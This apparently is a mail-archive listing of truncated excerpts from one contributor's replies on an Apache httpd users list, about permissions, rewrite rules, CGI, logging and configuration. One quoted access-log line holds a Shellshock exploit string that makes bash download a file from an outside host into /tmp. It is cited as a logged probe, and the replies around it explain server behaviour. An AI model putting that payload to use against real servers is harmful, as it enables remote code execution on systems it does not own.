requests when invoked via the CGI protocol.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
don't use shell scripts (that is, a program written
in sh/bash/ksh/zsh or similar languages that adhere to the POSIX 1003 shell
standard). That can only lead to much wasted time, bugs, and security
holes. Yes, it is technically possible to handle a HTTP POST request using
such a shell.
at has bound to port 80. Run
that now so you learn what to look for. Find the line that contains ":80"
in the local address column and "LISTEN" in the state column. Next to that
will be the PID and process name.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
that address three days ago and
automatically blacklisted by my firewall because the HTTP request specified
an invalid HTTP "Host:" header.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
mand. Easiest way is via mod_allowmethods:
https://httpd.apache.org/docs/2.4/mod/mod_allowmethods.html
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
tory. But that is moot
given that you already had to grant the web server access to your home
directory in order to support your requirements. The concern now is whether
user accounts on your machine other than the one running the apache web
server can exploit those looser permissions.
's a potential information leak that could
theoretically be used to launch an attack. Whether that's a concern for you
depends on a lot of factors.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
either the public execute bit is not set, or
the group execute bit is not set or if set apache is not a member of that
group, or the user execute bit is not set or if set apache is not running
as that user.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
> solution on several forums before.
>
> I doubt whether Perdition can help me out on my current test ?
>
>
What is the relevance of the Perdition mail proxy to your current problem?
It seems to me that you don't understand the difference between the SMTP
and HTTPD protocols. Which i
.wikipedia.org/wiki/Squid_(software).
> I expect keeping the Host clean for running VirtualBox ONLY.
>
Then you need another system that handles all traffic to/from your single
fixed/static IP address on which you can run a "reverse proxy" and forwards
traffic to the ap
the CHANGES file might be relevant:
Changes with Apache 2.4.2
*) SECURITY: CVE-2012-0883 (cve.mitre.org)
envvars: Fix insecure handling of LD_LIBRARY_PATH that could lead to the
current working directory to be searched for DSOs. [Stefan Fritsch]
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
rg
with description of your problem. Include any relevant configuration
options, error messages, and how to reproduce the problem.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
e original question
about configurable values for ServerLimit, ThreadsPerChild, etc.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ctories. However, you clearly have other
customizations in place since "which httpd" would not normally show the
output you reported. So it's possible your $PATH also contains atypical
entries that may cause httpd 2.2 to be found first even after you run "brew
link".
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
I tested this on my system. The value logged by %L in the access log
cannot be found in the error log. The %L value is clearly a hash of some
sort (e.g., SHA1 value of the incoming IP address and port) converted to
ASCII. This looks like a bug to me.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
null)
bytes. So if you want to capture binary data you'll want to use the fixed
version I attached to this problem report:
https://bz.apache.org/bugzilla/show_bug.cgi?id=57045
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ectory listings do
not normally involve mmap'ing static files. So I suspect there is something
unusual about your apache config that worked fine, possibly by accident,
under version 2.2 and results in incorrect output under version 2.4. Are
you using any third-party modules? Can you employ a "divide and
It seems to me you're confusing a guideline (e.g., minimize the
number of processes per container) for a mandate (e.g., have only one
process per container).
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ll do
> that.
>
Works for me. Let us know if it doesn't work for you.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ng a script or a binary. If you choose to invoke the
httpd binary directly without the aid of a wrapper script it simply becomes
your responsibility to pass all necessary and appropriate arguments; e.g.,
-f to specify where the config file can be found.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
." (dot or "source") command before invoking the httpd binary.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
to recognizing
and dispatching incoming requests as well as dealing with housekeeping
chores may mandate one or more processes or threads for activities other
than handling a HTTP request.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
On Sat, Oct 24, 2015 at 11:31 PM, Nick Kew <n...@webthing.com> wrote:
> On Sat, 2015-10-24 at 21:11 -0700, Kurtis Rader wrote:
> > I'm going to assume that by "single process" you meant "single user".
>
> If you read the docs, you'll find single proce
how to configure a Docker container to
die if the Apache HTTP server dies. Nor how to start an Apache HTTP server
daemon and have its output written to stdout and stderr in a manner that
can be collected by whatever software monitors the output of a Docker
virtual machine.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
@updates
> libreport-plugin-kerneloops.x86_64 2.6.2-4.fc22 @updates
> [root@casablanca ~]#
>
> Here, the kernel 4.2.3-200.fc22 is installed and the machine according to
> uname -r booted from it.
>
> -
>
> Does the BIOS boot partition make the difference? Can anybody explain
> this strange behaviour?
>
> Thanks for your attention.
>
> suomi
>
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
on directory for all the files you
need is root ("/").
P.S., There are very fringe, unusual, computers that directly execute byte
code for languages like Forth and Java rather than machine language as
typically understood by most CPUs. But even those systems are effectively
executing binaries.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
On Fri, Oct 16, 2015 at 6:23 PM, Good Guy <xfs...@hotmail.com> wrote:
> On 17/10/2015 01:41, Kurtis Rader wrote:
>
>>
>> That is not correct, Good Guy. Linux, and pretty much any operating
>> system, uses binary programs. Which means programs that consist of
tion is to compile it from source with whatever options meet
your requirements. For example, the install dir might be
/usr/local/apache24_testing or some such that exists on both of your
systems. Building from source on Linux is trivial (unlike on MS Windows).
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ons.
>
The [OR] on the second RewriteCond does nothing since it isn't followed by
another RewriteCond. You also don't need the first RewriteCond since by
definition an empty HTTP_REFERER won't match pattern.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ile /data/apache/patch2.2/lib/libaprutil-1.so exist? Do the other
shared object pathnames exist? If they exist run the "file" command against
them and the httpd binary. Are they all the same architecture? Especially,
are they all 32 or 64 bit binaries? If they're 64-bit binaries does the
system you're trying to run them on support 64-bit binaries?
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
r how can
>
> carry data like ap_table with key value between modules. is it possible?
> Thanks.
>
You are unlikely to get an answer on this mailing list. Even though
developers (like myself) read this mailing list it isn't the correct forum
for such questions. Check out the "Third-Party Mo
obviously wrong with what you showed
us other than you probably should be using %{HTTP_HOST} and the RewriteRule
statement is needlessly complicated (but then so are most of the examples I
saw from the google search recommended).
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
r "setfib invalid fib"
yields a bunch of results that suggest you're running apache on FreeBSD.
Further, the setfib command runs a program with a specific routing table.
Presumably this has something to do with IP firewalls on FreeBSD. So asking
this question on a FreeBSD mailing list or forum is
> *The main thing here is Apache http server is on Windows machine.*
>
If you are trying to use a module that is not part of the core Apache HTTP
server and which is only available on MS Windows you should ask for help on
whatever mailing list or web site is devoted to supporting that module.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
Explorer only. Is that true?
>
> Please help me out here. This is very crucial for my project and deadline
> is already passed. :(
>
> Please let me know in case of any other queries.
>
> Thanks & Regards,
> *Ashish Mistry*
>
> --
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
>
The common log format (CLF), which is the default, leaves a lot to be
desired. I highly recommend using a CustomLog format that includes, at a
minimum, "%{Host}i" so that the client provided HTTP host header is part of
the lo
r
only provides static content. A lower value (in the single digits) might,
if you're lucky, mitigate a DDOS attack enough to keep your server from
melting down.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
com> works fine and goes to the
> correct site.
>
> example.com does not work and gets into a redirect loop.
>
> What do I need to configure to get example.com to work ?
>
> Thanks,
>
> Warren Bell
>
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
experiment at a time; i.e., issuing one client request then saving the log
files for analysis. If you do not minimize the number of variables (e.g.,
the number of unrelated HTTP requests) it can be very difficult to derive
any conclusions from the data.
--
Kurtis Rader
Caretaker of the exceptional
please say so.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
I then issue a series of carefully constructed HTTP requests meant to
eliminate irrelevant details and examine the error log for clues.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
is not clear from your description.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
by the remote IP address is shown as
localhost:80? Shown where? By what program?
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
project adheres to that rule.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
#documentroot ) doesn't even
mention the corresponding env var. I think that's a documentation bug.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
about what is passed to the subprocess. I
would open a second issue asking that the documentation make it clear when
directives like DocumentRoot have the side effect of setting an environment
variable.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
links to
the official specification at http://www.ietf.org/rfc/rfc3875.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
fault.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
should get a permission denied error.
As user1 restore the x permission and remove the r permission from the
directory:
chmod 511 /test
As user2 repeat the ls command:
ls -l /test/file
It should work this time.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
krader_custom
ErrorLog |/usr/sbin/rotatelogs -c -f -l -L
/private/var/log/apache2/test-error.log
/private/var/log/apache2/test-error.log.%Y-%m-%d 86400
Obviously you'll want to substitute another program for
/usr/sbin/rotatelogs in the example above that writes the data where you
want it to go.
--
Kurtis
to
stackoverflow, and the best idea given was creating a symlink in the
container. Is there a way to do this officially?
http://stackoverflow.com/posts/32013582
FYI, That URL isn't valid; it results in a page not found error from
Stack Overflow.
--
Kurtis Rader
Caretaker of the exceptional canines
up to this point have had fairly obvious
answers and didn't require actual knowledge of your web server environment
that we could help.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
. Information is passed to
them from the web server via environment variables and, for POST requests,
standard input. You pass arguments to a CGI script via the URI query
string. See https://en.wikipedia.org/wiki/Common_Gateway_Interface
--
Kurtis Rader
Caretaker of the exceptional canines Junior
75.101.21.75 GET / HTTP/1.0 () { :;}; /bin/bash -c \wget -O
/tmp/bbb dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735\
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
(e.g., a .htaccess file) all of
the directives are parsed and processed before being applied to the current
request. So, as Zimmi points out, having more than one RewriteEngine
doesn't make any sense. The same is true for RewriteBase.
--
Kurtis Rader
Caretaker of the exceptional canines Junior
=catshowref=books HTTP/1.1 curl/7.37.1
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
which the request
originated. Your error log should include the entire URI, including query
string, sent to your server.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
for short
durations. But for longer term tracking of requests to your server it's
better, and less resource intensive, if you simply define a CustomLog that
includes the %r format string so that the entire URI ends up in the
access log.
--
Kurtis Rader
Caretaker of the exceptional canines Junior
On Sat, Jun 27, 2015 at 1:58 PM, James Moe ji...@sohnen-moe.com wrote:
On 06/27/2015 12:00 PM, Kurtis Rader wrote:
<IfModule dumpio_module>
I guess this build did not include dumpio_module. Adding the above
produced no additional logging.
Did you add or uncomment the appropriate
probably include your entire .htaccess and
httpd.conf files (stripped of anything sensitive like paths to security
certificates) as attachments.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
remove the Redirect directive?
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
requests so that you have total
control over the URI and headers being passed to your server.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
]
If you then issue a GET /category/?testing=123 do you get a 403 Forbidden
status in response?
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
what is happening.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
, your pattern doesn't handle the case where the parameters are
separated by semicolons (which is a legal alternative to ampersand). In
general matching against QUERY_STRING is very difficult to do in a robust
manner.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
On Fri, Jun 26, 2015 at 1:36 PM, Kurtis Rader kra...@skepticism.us wrote:
My question for James would be how do you know the query string has the
parameters in that exact order? Unless the query string has been
hand-crafted you cannot assume the parameters will appear in any specific
order
,
directory, virtual host).
P.S., If you want to match the query string literally rather than as a
pattern which matches a subset of the query string you should preface the
pattern with an equal-sign:
RewriteCond %{QUERY_STRING} =app=ecomns=catshowref=books
--
Kurtis Rader
Caretaker
to remove packages then manually remove any
unexpected files related to those packages that are still in the filesystem
before retrying the install.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
arguments
are parsed. I strongly recommend using only forward slashes in file paths
whenever possible and never mix forward and back slashes as path separators.
P.S., This type of problem is a good example of why you want to avoid
shelling out to an external program whenever possible.
--
Kurtis
timestamp of 786326400, 1994-12-02
00:00:00 local time. I would recommend searching for values in the
range 786297600
+/- n * 3600 for n in -12+12.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
+Cookie+check
```
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
%{QUERY_STRING} !=
RewriteRule ^ %{REQUEST_URI}? [R=302,L]
When I issue a GET /hello.php?whatever=1 with either version I get a 302
response with
Location: http://www.skepticism.us/hello.php
Also, if you don't want to match non-whitespace I recommend \S rather than [^\ ].
--
Kurtis Rader
is the wrong place to do it then I would recommend ModSecurity:
http://www.modsecurity.org/.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
* self.ratio
if self.allowance > self.rate:
    self.allowance = int(self.rate)  # throttle
if self.allowance < 1.0:
    return True
else:
    self.allowance -= 1.0
    return False
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
. There is probably a GUI (graphical user interface)
means of ascertaining the same data but I have no idea how to do so since I
generally prefer old-school CLI methods.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank